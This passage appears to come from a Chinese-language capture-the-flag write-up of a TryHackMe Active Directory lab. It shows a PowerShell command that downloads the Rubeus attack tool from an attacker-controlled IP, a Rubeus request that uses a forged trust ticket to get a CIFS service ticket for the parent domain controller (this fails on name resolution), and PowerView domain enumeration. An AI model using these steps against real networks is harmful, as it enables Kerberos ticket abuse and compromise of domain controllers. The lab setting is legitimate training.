powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.63.196/Rubeus.exe','C:\users\bitbucket\Desktop\Rubeus.exe')"

应用Rubeus尝试生成一个tgs

PS C:\users\bitbucket\Desktop> .\Rubeus.exe asktgs /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi /service:cifs/ENTERPRISE-DC.ENTERPRISE.THM /dc:ENTERPRISE-DC.ENTERPRISE.THM /ptt   ______        _  (_____ \      | |   _____) )_   _| |__  _____ _   _  ___  |  __  /| | | |  _ \| ___ | | | |/___)  | |  \ \| |_| | |_) ) ____| |_| |___ |  |_|   |_|____/|____/|_____)____/(___/  v1.5.0[*] Action: Ask TGS[X] Error resolving hostname 'ENTERPRISE-DC.ENTERPRISE.THM' to an IP address: No such host is known

然而报错了，说找不到这个主机名

用powerview查找也没找到

PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain LAB.ENTERPRISE.THMLAB-DC.LAB.ENTERPRISE.THMPS C:\users\bitbucket\Desktop> Get-NetComputer -Domain ENTERPRISE.THMWARNING: Error: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server."

这个就很奇怪。。